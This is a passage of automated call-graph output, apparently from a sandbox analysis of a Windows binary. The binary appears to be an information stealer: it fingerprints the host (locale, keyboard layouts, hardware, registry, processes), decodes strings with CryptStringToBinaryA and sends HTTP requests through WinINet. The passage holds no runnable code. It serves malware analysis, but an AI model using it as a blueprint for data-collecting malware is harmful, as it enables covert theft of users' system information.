API calls 14530->14531 14532 55552e 14531->14532 14533 55a820 2 API calls 14532->14533 14534 55553b 14533->14534 14535 55a820 2 API calls 14534->14535 14536 555548 14535->14536 14537 55a740 lstrcpy 14536->14537 14538 555555 14537->14538 14539 55a740 lstrcpy 14538->14539 14540 555562 14539->14540 14541 55a740 lstrcpy 14540->14541 14542 55556f 14541->14542 14543 55a740 lstrcpy 14542->14543 14563 55557c 14543->14563 14544 5552c0 25 API calls 14544->14563 14545 5551f0 20 API calls 14545->14563 14546 555643 StrCmpCA 14546->14563 14547 5556a0 StrCmpCA 14548 5557dc 14547->14548 14547->14563 14549 55a8a0 lstrcpy 14548->14549 14550 5557e8 14549->14550 14551 55a820 2 API calls 14550->14551 14553 5557f6 14551->14553 14552 55a740 lstrcpy 14552->14563 14556 55a820 2 API calls 14553->14556 14554 555856 StrCmpCA 14555 555991 14554->14555 14554->14563 14557 55a8a0 lstrcpy 14555->14557 14558 555805 14556->14558 14559 55599d 14557->14559 14560 541670 lstrcpy 14558->14560 14562 55a820 2 API calls 14559->14562 14582 555811 14560->14582 14561 55a820 lstrlen lstrcpy 14561->14563 14565 5559ab 14562->14565 14563->14544 14563->14545 14563->14546 14563->14547 14563->14552 14563->14554 14563->14561 14564 555a0b StrCmpCA 14563->14564 14573 541590 lstrcpy 14563->14573 14578 55578a StrCmpCA 14563->14578 14580 55593f StrCmpCA 14563->14580 14581 55a7a0 lstrcpy 14563->14581 14583 55a8a0 lstrcpy 14563->14583 14566 555a16 Sleep 14564->14566 14567 555a28 14564->14567 14568 55a820 2 API calls 14565->14568 14566->14563 14569 55a8a0 lstrcpy 14567->14569 14570 5559ba 14568->14570 14572 555a34 14569->14572 14571 541670 lstrcpy 14570->14571 14571->14582 14574 55a820 2 API calls 14572->14574 14573->14563 14575 555a43 14574->14575 14576 55a820 2 API calls 14575->14576 14577 555a52 14576->14577 14579 541670 lstrcpy 14577->14579 14578->14563 14579->14582 14580->14563 14581->14563 14582->13636 14583->14563 14585 557553 GetVolumeInformationA 14584->14585 14586 55754c 14584->14586 14587 557591 14585->14587 14586->14585 14588 5575fc GetProcessHeap RtlAllocateHeap 14587->14588 14589 557619 14588->14589 14590 557628 wsprintfA 14588->14590 14592 55a740 lstrcpy 14589->14592 14591 55a740 lstrcpy 14590->14591 14593 555da7 14591->14593 14592->14593 14593->13657 14595 55a7a0 lstrcpy 14594->14595 14596 544899 14595->14596 15648 5447b0 14596->15648 14598 5448a5 14599 55a740 lstrcpy 14598->14599 14600 5448d7 14599->14600 14601 55a740 lstrcpy 14600->14601 14602 5448e4 14601->14602 14603 55a740 lstrcpy 14602->14603 14604 5448f1 14603->14604 14605 55a740 lstrcpy 14604->14605 14606 5448fe 14605->14606 14607 55a740 lstrcpy 14606->14607 14608 54490b InternetOpenA StrCmpCA 14607->14608 14609 544944 14608->14609 14610 544ecb InternetCloseHandle 14609->14610 15654 558b60 14609->15654 14611 544ee8 14610->14611 15669 549ac0 CryptStringToBinaryA 14611->15669 14613 544963 15662 55a920 14613->15662 14616 544976 14618 55a8a0 lstrcpy 14616->14618 14623 54497f 14618->14623 14619 55a820 2 API calls 14620 544f05 14619->14620 14622 55a9b0 4 API calls 14620->14622 14621 544f27 ctype 14625 55a7a0 lstrcpy 14621->14625 14624 544f1b 14622->14624 14627 55a9b0 4 API calls 14623->14627 14626 55a8a0 lstrcpy 14624->14626 14638 544f57 14625->14638 14626->14621 14628 5449a9 14627->14628 14629 55a8a0 lstrcpy 14628->14629 14630 5449b2 14629->14630 14631 55a9b0 4 API calls 14630->14631 14632 5449d1 14631->14632 14633 55a8a0 lstrcpy 14632->14633 14634 5449da 14633->14634 14635 55a920 3 API calls 14634->14635 14636 5449f8 14635->14636 14637 55a8a0 lstrcpy 14636->14637 14639 544a01 14637->14639 14638->13660 14640 55a9b0 4 API calls 14639->14640 14641 544a20 14640->14641 14642 55a8a0 lstrcpy 14641->14642 14643 544a29 14642->14643 14644 55a9b0 4 API calls 14643->14644 14645 544a48 14644->14645 14646 55a8a0 lstrcpy 14645->14646 14647 544a51 14646->14647 14648 55a9b0 4 API calls 14647->14648 14649 544a7d 14648->14649 14650 55a920 3 API calls 14649->14650 14651 544a84 14650->14651 14652 55a8a0 lstrcpy 14651->14652 14653 544a8d 14652->14653 14654 544aa3 InternetConnectA 14653->14654 14654->14610 14655 544ad3 HttpOpenRequestA 14654->14655 14657 544ebe InternetCloseHandle 14655->14657 14658 544b28 14655->14658 14657->14610 14659 55a9b0 4 API calls 14658->14659 14660 544b3c 14659->14660 14661 55a8a0 lstrcpy 14660->14661 14662 544b45 14661->14662 14663 55a920 3 API calls 14662->14663 14664 544b63 14663->14664 14665 55a8a0 lstrcpy 14664->14665 14666 544b6c 14665->14666 14667 55a9b0 4 API calls 14666->14667 14668 544b8b 14667->14668 14669 55a8a0 lstrcpy 14668->14669 14670 544b94 14669->14670 14671 55a9b0 4 API calls 14670->14671 14672 544bb5 14671->14672 14673 55a8a0 lstrcpy 14672->14673 14674 544bbe 14673->14674 14675 55a9b0 4 API calls 14674->14675 14676 544bde 14675->14676 14677 55a8a0 lstrcpy 14676->14677 14678 544be7 14677->14678 14679 55a9b0 4 API calls 14678->14679 14680 544c06 14679->14680 14681 55a8a0 lstrcpy 14680->14681 14682 544c0f 14681->14682 14683 55a920 3 API calls 14682->14683 14684 544c2d 14683->14684 14685 55a8a0 lstrcpy 14684->14685 14686 544c36 14685->14686 14687 55a9b0 4 API calls 14686->14687 14688 544c55 14687->14688 14689 55a8a0 lstrcpy 14688->14689 14690 544c5e 14689->14690 14691 55a9b0 4 API calls 14690->14691 14692 544c7d 14691->14692 14693 55a8a0 lstrcpy 14692->14693 14694 544c86 14693->14694 14695 55a920 3 API calls 14694->14695 14696 544ca4 14695->14696 14697 55a8a0 lstrcpy 14696->14697 14698 544cad 14697->14698 14699 55a9b0 4 API calls 14698->14699 14700 544ccc 14699->14700 14701 55a8a0 lstrcpy 14700->14701 14702 544cd5 14701->14702 14703 55a9b0 4 API calls 14702->14703 14704 544cf6 14703->14704 14705 55a8a0 lstrcpy 14704->14705 14706 544cff 14705->14706 14707 55a9b0 4 API calls 14706->14707 14708 544d1f 14707->14708 14709 55a8a0 lstrcpy 14708->14709 14710 544d28 14709->14710 14711 55a9b0 4 API calls 14710->14711 14712 544d47 14711->14712 14713 55a8a0 lstrcpy 14712->14713 14714 544d50 14713->14714 14715 55a920 3 API calls 14714->14715 14716 544d6e 14715->14716 14717 55a8a0 lstrcpy 14716->14717 14718 544d77 14717->14718 14719 55a740 lstrcpy 14718->14719 14720 544d92 14719->14720 14721 55a920 3 API calls 14720->14721 14722 544db3 14721->14722 14723 55a920 3 API calls 14722->14723 14724 544dba 14723->14724 14725 55a8a0 lstrcpy 14724->14725 14726 544dc6 14725->14726 14727 544de7 lstrlen 14726->14727 14728 544dfa 14727->14728 14729 544e03 lstrlen 14728->14729 15668 55aad0 14729->15668 14731 544e13 HttpSendRequestA 14732 544e32 InternetReadFile 14731->14732 14733 544e67 InternetCloseHandle 14732->14733 14738 544e5e 14732->14738 14736 55a800 14733->14736 14735 55a9b0 4 API calls 14735->14738 14736->14657 14737 55a8a0 lstrcpy 14737->14738 14738->14732 14738->14733 14738->14735 14738->14737 15675 55aad0 14739->15675 14741 5517c4 StrCmpCA 14742 5517d7 14741->14742 14743 5517cf ExitProcess 14741->14743 14744 5519c2 14742->14744 14745 5518f1 StrCmpCA 14742->14745 14746 551951 StrCmpCA 14742->14746 14747 551970 StrCmpCA 14742->14747 14748 551913 StrCmpCA 14742->14748 14749 551932 StrCmpCA 14742->14749 14750 55185d StrCmpCA 14742->14750 14751 55187f StrCmpCA 14742->14751 14752 5518ad StrCmpCA 14742->14752 14753 5518cf StrCmpCA 14742->14753 14754 55a820 lstrlen lstrcpy 14742->14754 14744->13662 14745->14742 14746->14742 14747->14742 14748->14742 14749->14742 14750->14742 14751->14742 14752->14742 14753->14742 14754->14742 14756 55a7a0 lstrcpy 14755->14756 14757 545979 14756->14757 14758 5447b0 2 API calls 14757->14758 14759 545985 14758->14759 14760 55a740 lstrcpy 14759->14760 14761 5459ba 14760->14761 14762 55a740 lstrcpy 14761->14762 14763 5459c7 14762->14763 14764 55a740 lstrcpy 14763->14764 14765 5459d4 14764->14765 14766 55a740 lstrcpy 14765->14766 14767 5459e1 14766->14767 14768 55a740 lstrcpy 14767->14768 14769 5459ee InternetOpenA StrCmpCA 14768->14769 14770 545a1d 14769->14770 14771 545fc3 InternetCloseHandle 14770->14771 14772 558b60 3 API calls 14770->14772 14773 545fe0 14771->14773 14774 545a3c 14772->14774 14776 549ac0 4 API calls 14773->14776 14775 55a920 3 API calls 14774->14775 14777 545a4f 14775->14777 14778 545fe6 14776->14778 14779 55a8a0 lstrcpy 14777->14779 14780 55a820 2 API calls 14778->14780 14783 54601f ctype 14778->14783 14785 545a58 14779->14785 14781 545ffd 14780->14781 14782 55a9b0 4 API calls 14781->14782 14784 546013 14782->14784 14787 55a7a0 lstrcpy 14783->14787 14786 55a8a0 lstrcpy 14784->14786 14788 55a9b0 4 API calls 14785->14788 14786->14783 14796 54604f 14787->14796 14789 545a82 14788->14789 14790 55a8a0 lstrcpy 14789->14790 14791 545a8b 14790->14791 14792 55a9b0 4 API calls 14791->14792 14793 545aaa 14792->14793 14794 55a8a0 lstrcpy 14793->14794 14795 545ab3 14794->14795 14797 55a920 3 API calls 14795->14797 14796->13668 14798 545ad1 14797->14798 14799 55a8a0 lstrcpy 14798->14799 14800 545ada 14799->14800 14801 55a9b0 4 API calls 14800->14801 14802 545af9 14801->14802 14803 55a8a0 lstrcpy 14802->14803 14804 545b02 14803->14804 14805 55a9b0 4 API calls 14804->14805 14806 545b21 14805->14806 14807 55a8a0 lstrcpy 14806->14807 14808 545b2a 14807->14808 14809 55a9b0 4 API calls 14808->14809 14810 545b56 14809->14810 14811 55a920 3 API calls 14810->14811 14812 545b5d 14811->14812 14813 55a8a0 lstrcpy 14812->14813 14814 545b66 14813->14814 14815 545b7c InternetConnectA 14814->14815 14815->14771 14816 545bac HttpOpenRequestA 14815->14816 14818 545fb6 InternetCloseHandle 14816->14818 14819 545c0b 14816->14819 14818->14771 14820 55a9b0 4 API calls 14819->14820 14821 545c1f 14820->14821 14822 55a8a0 lstrcpy 14821->14822 14823 545c28 14822->14823 14824 55a920 3 API calls 14823->14824 14825 545c46 14824->14825 14826 55a8a0 lstrcpy 14825->14826 14827 545c4f 14826->14827 14828 55a9b0 4 API calls 14827->14828 14829 545c6e 14828->14829 14830 55a8a0 lstrcpy 14829->14830 14831 545c77 14830->14831 14832 55a9b0 4 API calls 14831->14832 14833 545c98 14832->14833 14834 55a8a0 lstrcpy 14833->14834 14835 545ca1 14834->14835 14836 55a9b0 4 API calls 14835->14836 14837 545cc1 14836->14837 14838 55a8a0 lstrcpy 14837->14838 14839 545cca 14838->14839 14840 55a9b0 4 API calls 14839->14840 14841 545ce9 14840->14841 14842 55a8a0 lstrcpy 14841->14842 14843 545cf2 14842->14843 14844 55a920 3 API calls 14843->14844 14845 545d10 14844->14845 14846 55a8a0 lstrcpy 14845->14846 14847 545d19 14846->14847 14848 55a9b0 4 API calls 14847->14848 14849 545d38 14848->14849 14850 55a8a0 lstrcpy 14849->14850 14851 545d41 14850->14851 14852 55a9b0 4 API calls 14851->14852 14853 545d60 14852->14853 14854 55a8a0 lstrcpy 14853->14854 14855 545d69 14854->14855 14856 55a920 3 API calls 14855->14856 14857 545d87 14856->14857 14858 55a8a0 lstrcpy 14857->14858 14859 545d90 14858->14859 14860 55a9b0 4 API calls 14859->14860 14861 545daf 14860->14861 14862 55a8a0 lstrcpy 14861->14862 14863 545db8 14862->14863 14864 55a9b0 4 API calls 14863->14864 14865 545dd9 14864->14865 14866 55a8a0 lstrcpy 14865->14866 14867 545de2 14866->14867 14868 55a9b0 4 API calls 14867->14868 14869 545e02 14868->14869 14870 55a8a0 lstrcpy 14869->14870 14871 545e0b 14870->14871 14872 55a9b0 4 API calls 14871->14872 14873 545e2a 14872->14873 14874 55a8a0 lstrcpy 14873->14874 14875 545e33 14874->14875 14876 55a920 3 API calls 14875->14876 14877 545e54 14876->14877 14878 55a8a0 lstrcpy 14877->14878 14879 545e5d 14878->14879 14880 545e70 lstrlen 14879->14880 15676 55aad0 14880->15676 14882 545e81 lstrlen GetProcessHeap RtlAllocateHeap 15677 55aad0 14882->15677 14884 545eae lstrlen 14885 545ebe 14884->14885 14886 545ed7 lstrlen 14885->14886 14887 545ee7 14886->14887 14888 545ef0 lstrlen 14887->14888 14889 545f03 14888->14889 14890 545f1a lstrlen 14889->14890 15678 55aad0 14890->15678 14892 545f2a HttpSendRequestA 14893 545f35 InternetReadFile 14892->14893 14894 545f6a InternetCloseHandle 14893->14894 14898 545f61 14893->14898 14894->14818 14896 55a9b0 4 API calls 14896->14898 14897 55a8a0 lstrcpy 14897->14898 14898->14893 14898->14894 14898->14896 14898->14897 14901 551077 14899->14901 14900 551151 14900->13670 14901->14900 14902 55a820 lstrlen lstrcpy 14901->14902 14902->14901 14904 550db7 14903->14904 14905 550f17 14904->14905 14906 550ea4 StrCmpCA 14904->14906 14907 550e27 StrCmpCA 14904->14907 14908 550e67 StrCmpCA 14904->14908 14909 55a820 lstrlen lstrcpy 14904->14909 14905->13678 14906->14904 14907->14904 14908->14904 14909->14904 14911 550f67 14910->14911 14912 551044 14911->14912 14913 550fb2 StrCmpCA 14911->14913 14914 55a820 lstrlen lstrcpy 14911->14914 14912->13686 14913->14911 14914->14911 14916 55a740 lstrcpy 14915->14916 14917 551a26 14916->14917 14918 55a9b0 4 API calls 14917->14918 14919 551a37 14918->14919 14920 55a8a0 lstrcpy 14919->14920 14921 551a40 14920->14921 14922 55a9b0 4 API calls 14921->14922 14923 551a5b 14922->14923 14924 55a8a0 lstrcpy 14923->14924 14925 551a64 14924->14925 14926 55a9b0 4 API calls 14925->14926 14927 551a7d 14926->14927 14928 55a8a0 lstrcpy 14927->14928 14929 551a86 14928->14929 14930 55a9b0 4 API calls 14929->14930 14931 551aa1 14930->14931 14932 55a8a0 lstrcpy 14931->14932 14933 551aaa 14932->14933 14934 55a9b0 4 API calls 14933->14934 14935 551ac3 14934->14935 14936 55a8a0 lstrcpy 14935->14936 14937 551acc 14936->14937 14938 55a9b0 4 API calls 14937->14938 14939 551ae7 14938->14939 14940 55a8a0 lstrcpy 14939->14940 14941 551af0 14940->14941 14942 55a9b0 4 API calls 14941->14942 14943 551b09 14942->14943 14944 55a8a0 lstrcpy 14943->14944 14945 551b12 14944->14945 14946 55a9b0 4 API calls 14945->14946 14947 551b2d 14946->14947 14948 55a8a0 lstrcpy 14947->14948 14949 551b36 14948->14949 14950 55a9b0 4 API calls 14949->14950 14951 551b4f 14950->14951 14952 55a8a0 lstrcpy 14951->14952 14953 551b58 14952->14953 14954 55a9b0 4 API calls 14953->14954 14955 551b76 14954->14955 14956 55a8a0 lstrcpy 14955->14956 14957 551b7f 14956->14957 14958 557500 6 API calls 14957->14958 14959 551b96 14958->14959 14960 55a920 3 API calls 14959->14960 14961 551ba9 14960->14961 14962 55a8a0 lstrcpy 14961->14962 14963 551bb2 14962->14963 14964 55a9b0 4 API calls 14963->14964 14965 551bdc 14964->14965 14966 55a8a0 lstrcpy 14965->14966 14967 551be5 14966->14967 14968 55a9b0 4 API calls 14967->14968 14969 551c05 14968->14969 14970 55a8a0 lstrcpy 14969->14970 14971 551c0e 14970->14971 15679 557690 GetProcessHeap RtlAllocateHeap 14971->15679 14974 55a9b0 4 API calls 14975 551c2e 14974->14975 14976 55a8a0 lstrcpy 14975->14976 14977 551c37 14976->14977 14978 55a9b0 4 API calls 14977->14978 14979 551c56 14978->14979 14980 55a8a0 lstrcpy 14979->14980 14981 551c5f 14980->14981 14982 55a9b0 4 API calls 14981->14982 14983 551c80 14982->14983 14984 55a8a0 lstrcpy 14983->14984 14985 551c89 14984->14985 15686 5577c0 GetCurrentProcess IsWow64Process 14985->15686 14988 55a9b0 4 API calls 14989 551ca9 14988->14989 14990 55a8a0 lstrcpy 14989->14990 14991 551cb2 14990->14991 14992 55a9b0 4 API calls 14991->14992 14993 551cd1 14992->14993 14994 55a8a0 lstrcpy 14993->14994 14995 551cda 14994->14995 14996 55a9b0 4 API calls 14995->14996 14997 551cfb 14996->14997 14998 55a8a0 lstrcpy 14997->14998 14999 551d04 14998->14999 15000 557850 3 API calls 14999->15000 15001 551d14 15000->15001 15002 55a9b0 4 API calls 15001->15002 15003 551d24 15002->15003 15004 55a8a0 lstrcpy 15003->15004 15005 551d2d 15004->15005 15006 55a9b0 4 API calls 15005->15006 15007 551d4c 15006->15007 15008 55a8a0 lstrcpy 15007->15008 15009 551d55 15008->15009 15010 55a9b0 4 API calls 15009->15010 15011 551d75 15010->15011 15012 55a8a0 lstrcpy 15011->15012 15013 551d7e 15012->15013 15014 5578e0 3 API calls 15013->15014 15015 551d8e 15014->15015 15016 55a9b0 4 API calls 15015->15016 15017 551d9e 15016->15017 15018 55a8a0 lstrcpy 15017->15018 15019 551da7 15018->15019 15020 55a9b0 4 API calls 15019->15020 15021 551dc6 15020->15021 15022 55a8a0 lstrcpy 15021->15022 15023 551dcf 15022->15023 15024 55a9b0 4 API calls 15023->15024 15025 551df0 15024->15025 15026 55a8a0 lstrcpy 15025->15026 15027 551df9 15026->15027 15688 557980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15027->15688 15030 55a9b0 4 API calls 15031 551e19 15030->15031 15032 55a8a0 lstrcpy 15031->15032 15033 551e22 15032->15033 15034 55a9b0 4 API calls 15033->15034 15035 551e41 15034->15035 15036 55a8a0 lstrcpy 15035->15036 15037 551e4a 15036->15037 15038 55a9b0 4 API calls 15037->15038 15039 551e6b 15038->15039 15040 55a8a0 lstrcpy 15039->15040 15041 551e74 15040->15041 15690 557a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15041->15690 15044 55a9b0 4 API calls 15045 551e94 15044->15045 15046 55a8a0 lstrcpy 15045->15046 15047 551e9d 15046->15047 15048 55a9b0 4 API calls 15047->15048 15049 551ebc 15048->15049 15050 55a8a0 lstrcpy 15049->15050 15051 551ec5 15050->15051 15052 55a9b0 4 API calls 15051->15052 15053 551ee5 15052->15053 15054 55a8a0 lstrcpy 15053->15054 15055 551eee 15054->15055 15693 557b00 GetUserDefaultLocaleName 15055->15693 15058 55a9b0 4 API calls 15059 551f0e 15058->15059 15060 55a8a0 lstrcpy 15059->15060 15061 551f17 15060->15061 15062 55a9b0 4 API calls 15061->15062 15063 551f36 15062->15063 15064 55a8a0 lstrcpy 15063->15064 15065 551f3f 15064->15065 15066 55a9b0 4 API calls 15065->15066 15067 551f60 15066->15067 15068 55a8a0 lstrcpy 15067->15068 15069 551f69 15068->15069 15697 557b90 15069->15697 15071 551f80 15072 55a920 3 API calls 15071->15072 15073 551f93 15072->15073 15074 55a8a0 lstrcpy 15073->15074 15075 551f9c 15074->15075 15076 55a9b0 4 API calls 15075->15076 15077 551fc6 15076->15077 15078 55a8a0 lstrcpy 15077->15078 15079 551fcf 15078->15079 15080 55a9b0 4 API calls 15079->15080 15081 551fef 15080->15081 15082 55a8a0 lstrcpy 15081->15082 15083 551ff8 15082->15083 15709 557d80 GetSystemPowerStatus 15083->15709 15086 55a9b0 4 API calls 15087 552018 15086->15087 15088 55a8a0 lstrcpy 15087->15088 15089 552021 15088->15089 15090 55a9b0 4 API calls 15089->15090 15091 552040 15090->15091 15092 55a8a0 lstrcpy 15091->15092 15093 552049 15092->15093 15094 55a9b0 4 API calls 15093->15094 15095 55206a 15094->15095 15096 55a8a0 lstrcpy 15095->15096 15097 552073 15096->15097 15098 55207e GetCurrentProcessId 15097->15098 15711 559470 OpenProcess 15098->15711 15101 55a920 3 API calls 15102 5520a4 15101->15102 15103 55a8a0 lstrcpy 15102->15103 15104 5520ad 15103->15104 15105 55a9b0 4 API calls 15104->15105 15106 5520d7 15105->15106 15107 55a8a0 lstrcpy 15106->15107 15108 5520e0 15107->15108 15109 55a9b0 4 API calls 15108->15109 15110 552100 15109->15110 15111 55a8a0 lstrcpy 15110->15111 15112 552109 15111->15112 15716 557e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15112->15716 15115 55a9b0 4 API calls 15116 552129 15115->15116 15117 55a8a0 lstrcpy 15116->15117 15118 552132 15117->15118 15119 55a9b0 4 API calls 15118->15119 15120 552151 15119->15120 15121 55a8a0 lstrcpy 15120->15121 15122 55215a 15121->15122 15123 55a9b0 4 API calls 15122->15123 15124 55217b 15123->15124 15125 55a8a0 lstrcpy 15124->15125 15126 552184 15125->15126 15720 557f60 15126->15720 15129 55a9b0 4 API calls 15130 5521a4 15129->15130 15131 55a8a0 lstrcpy 15130->15131 15132 5521ad 15131->15132 15133 55a9b0 4 API calls 15132->15133 15134 5521cc 15133->15134 15135 55a8a0 lstrcpy 15134->15135 15136 5521d5 15135->15136 15137 55a9b0 4 API calls 15136->15137 15138 5521f6 15137->15138 15139 55a8a0 lstrcpy 15138->15139 15140 5521ff 15139->15140 15733 557ed0 GetSystemInfo wsprintfA 15140->15733 15143 55a9b0 4 API calls 15144 55221f 15143->15144 15145 55a8a0 lstrcpy 15144->15145 15146 552228 15145->15146 15147 55a9b0 4 API calls 15146->15147 15148 552247 15147->15148 15149 55a8a0 lstrcpy 15148->15149 15150 552250 15149->15150 15151 55a9b0 4 API calls 15150->15151 15152 552270 15151->15152 15153 55a8a0 lstrcpy 15152->15153 15154 552279 15153->15154 15735 558100 GetProcessHeap RtlAllocateHeap 15154->15735 15157 55a9b0 4 API calls 15158 552299 15157->15158 15159 55a8a0 lstrcpy 15158->15159 15160 5522a2 15159->15160 15161 55a9b0 4 API calls 15160->15161 15162 5522c1 15161->15162 15163 55a8a0 lstrcpy 15162->15163 15164 5522ca 15163->15164 15165 55a9b0 4 API calls 15164->15165 15166 5522eb 15165->15166 15167 55a8a0 lstrcpy 15166->15167 15168 5522f4 15167->15168 15741 5587c0 15168->15741 15171 55a920 3 API calls 15172 55231e 15171->15172 15173 55a8a0 lstrcpy 15172->15173 15174 552327 15173->15174 15175 55a9b0 4 API calls 15174->15175 15176 552351 15175->15176 15177 55a8a0 lstrcpy 15176->15177 15178 55235a 15177->15178 15179 55a9b0 4 API calls 15178->15179 15180 55237a 15179->15180 15181 55a8a0 lstrcpy 15180->15181 15182 552383 15181->15182 15183 55a9b0 4 API calls 15182->15183 15184 5523a2 15183->15184 15185 55a8a0 lstrcpy 15184->15185 15186 5523ab 15185->15186 15746 5581f0 15186->15746 15188 5523c2 15189 55a920 3 API calls 15188->15189 15190 5523d5 15189->15190 15191 55a8a0 lstrcpy 15190->15191 15192 5523de 15191->15192 15193 55a9b0 4 API calls 15192->15193 15194 55240a 15193->15194 15195 55a8a0 lstrcpy 15194->15195 15196 552413 15195->15196 15197 55a9b0 4 API calls 15196->15197 15198 552432 15197->15198 15199 55a8a0 lstrcpy 15198->15199 15200 55243b 15199->15200 15201 55a9b0 4 API calls 15200->15201 15202 55245c 15201->15202 15203 55a8a0 lstrcpy 15202->15203 15204 552465 15203->15204 15205 55a9b0 4 API calls 15204->15205 15206 552484 15205->15206 15207 55a8a0 lstrcpy 15206->15207 15208 55248d 15207->15208 15209 55a9b0 4 API calls 15208->15209 15210 5524ae 15209->15210 15211 55a8a0 lstrcpy 15210->15211 15212 5524b7 15211->15212 15754 558320 15212->15754 15214 5524d3 15215 55a920 3 API calls 15214->15215 15216 5524e6 15215->15216 15217 55a8a0 lstrcpy 15216->15217 15218 5524ef 15217->15218 15219 55a9b0 4 API calls 15218->15219 15220 552519 15219->15220 15221 55a8a0 lstrcpy 15220->15221 15222 552522 15221->15222 15223 55a9b0 4 API calls 15222->15223 15224 552543 15223->15224 15225 55a8a0 lstrcpy 15224->15225 15226 55254c 15225->15226 15227 558320 17 API calls 15226->15227 15228 552568 15227->15228 15229 55a920 3 API calls 15228->15229 15230 55257b 15229->15230 15231 55a8a0 lstrcpy 15230->15231 15232 552584 15231->15232 15233 55a9b0 4 API calls 15232->15233 15234 5525ae 15233->15234 15235 55a8a0 lstrcpy 15234->15235 15236 5525b7 15235->15236 15237 55a9b0 4 API calls 15236->15237 15238 5525d6 15237->15238 15239 55a8a0 lstrcpy 15238->15239 15240 5525df 15239->15240 15241 55a9b0 4 API calls 15240->15241 15242 552600 15241->15242 15243 55a8a0 lstrcpy 15242->15243 15244 552609 15243->15244 15790 558680 15244->15790 15246 552620 15247 55a920 3 API calls 15246->15247 15248 552633 15247->15248 15249 55a8a0 lstrcpy 15248->15249 15250 55263c 15249->15250 15251 55265a lstrlen 15250->15251 15252 55266a 15251->15252 15253 55a740 lstrcpy 15252->15253 15254 55267c 15253->15254 15255 541590 lstrcpy 15254->15255 15256 55268d 15255->15256 15800 555190 15256->15800 15258 552699 15258->13690 15988 55aad0 15259->15988 15261 545009 InternetOpenUrlA 15262 545021 15261->15262 15263 5450a0 InternetCloseHandle InternetCloseHandle 15262->15263 15264 54502a InternetReadFile 15262->15264 15265 5450ec 15263->15265 15264->15262 15265->13694 15989 5498d0 15266->15989 15268 550759 15269 55077d 15268->15269 15270 550a38 15268->15270 15273 550799 StrCmpCA 15269->15273 15271 541590 lstrcpy 15270->15271 15272 550a49 15271->15272 16165 550250 15272->16165 15275 550843 15273->15275 15276 5507a8 15273->15276 15279 550865 StrCmpCA 15275->15279 15278 55a7a0 lstrcpy 15276->15278 15280 5507c3 15278->15280 15281 550874 15279->15281 15318 55096b 15279->15318 15282 541590 lstrcpy 15280->15282 15283 55a740 lstrcpy 15281->15283 15284 55080c 15282->15284 15286 550881 15283->15286 15287 55a7a0 lstrcpy 15284->15287 15285 55099c StrCmpCA 15289 550a2d 15285->15289 15290 5509ab 15285->15290 15291 55a9b0 4 API calls 15286->15291 15288 550823 15287->15288 15292 55a7a0 lstrcpy 15288->15292 15289->13698 15293 541590 lstrcpy 15290->15293 15294 5508ac 15291->15294 15295 55083e 15292->15295 15296 5509f4 15293->15296 15297 55a920 3 API calls 15294->15297 15992 54fb00 15295->15992 15299 55a7a0 lstrcpy 15296->15299 15300 5508b3 15297->15300 15301 550a0d 15299->15301 15302 55a9b0 4 API calls 15300->15302 15304 55a7a0 lstrcpy 15301->15304 15303 5508ba 15302->15303 15305 55a8a0 lstrcpy 15303->15305 15306 550a28 15304->15306 16108 550030 15306->16108 15318->15285 15640 55a7a0 lstrcpy 15639->15640 15641 541683 15640->15641 15642 55a7a0 lstrcpy 15641->15642 15643 541695 15642->15643 15644 55a7a0 lstrcpy 15643->15644 15645 5416a7 15644->15645 15646 55a7a0 lstrcpy 15645->15646 15647 5415a3 15646->15647 15647->14521 15649 5447c6 15648->15649 15650 544838 lstrlen 15649->15650 15674 55aad0 15650->15674 15652 544848 InternetCrackUrlA 15653 544867 15652->15653 15653->14598 15655 55a740 lstrcpy 15654->15655 15656 558b74 15655->15656 15657 55a740 lstrcpy 15656->15657 15658 558b82 GetSystemTime 15657->15658 15660 558b99 15658->15660 15659 55a7a0 lstrcpy 15661 558bfc 15659->15661 15660->15659 15661->14613 15663 55a931 15662->15663 15664 55a988 15663->15664 15666 55a968 lstrcpy lstrcat 15663->15666 15665 55a7a0 lstrcpy 15664->15665 15667 55a994 15665->15667 15666->15664 15667->14616 15668->14731 15670 549af9 LocalAlloc 15669->15670 15671 544eee 15669->15671 15670->15671 15672 549b14 CryptStringToBinaryA 15670->15672 15671->14619 15671->14621 15672->15671 15673 549b39 LocalFree 15672->15673 15673->15671 15674->15652 15675->14741 15676->14882 15677->14884 15678->14892 15807 5577a0 15679->15807 15682 5576c6 RegOpenKeyExA 15684 557704 RegCloseKey 15682->15684 15685 5576e7 RegQueryValueExA 15682->15685 15683 551c1e 15683->14974 15684->15683 15685->15684 15687 551c99 15686->15687 15687->14988 15689 551e09 15688->15689 15689->15030 15691 551e84 15690->15691 15692 557a9a wsprintfA 15690->15692 15691->15044 15692->15691 15694 551efe 15693->15694 15695 557b4d 15693->15695 15694->15058 15814 558d20 LocalAlloc CharToOemW 15695->15814 15698 55a740 lstrcpy 15697->15698 15699 557bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15698->15699 15708 557c25 15699->15708 15700 557c46 GetLocaleInfoA 15700->15708 15701 557d18 15702 557d1e LocalFree 15701->15702 15703 557d28 15701->15703 15702->15703 15704 55a7a0 lstrcpy 15703->15704 15707 557d37 15704->15707 15705 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15705->15708 15706 55a8a0 lstrcpy 15706->15708 15707->15071 15708->15700 15708->15701 15708->15705 15708->15706 15710 552008 15709->15710 15710->15086 15712 5594b5 15711->15712 15713 559493 GetModuleFileNameExA CloseHandle 15711->15713 15714 55a740 lstrcpy 15712->15714 15713->15712 15715 552091 15714->15715 15715->15101 15717 552119 15716->15717 15718 557e68 RegQueryValueExA 15716->15718 15717->15115 15719 557e8e RegCloseKey 15718->15719 15719->15717 15721 557fb9 GetLogicalProcessorInformationEx 15720->15721 15722 557fd8 GetLastError 15721->15722 15723 558029 15721->15723 15731 558022 15722->15731 15732 557fe3 15722->15732 15726 5589f0 2 API calls 15723->15726 15728 55807b 15726->15728 15727 5589f0 2 API calls 15729 552194 15727->15729 15730 558084 wsprintfA 15728->15730 15728->15731 15729->15129 15730->15729 15731->15727 15731->15729 15732->15721 15732->15729 15815 5589f0 15732->15815 15818 558a10 GetProcessHeap RtlAllocateHeap 15732->15818 15734 55220f 15733->15734 15734->15143 15736 5589b0 15735->15736 15737 55814d GlobalMemoryStatusEx 15736->15737 15738 558163 __aulldiv 15737->15738 15739 55819b wsprintfA 15738->15739 15740 552289 15739->15740 15740->15157 15742 5587fb 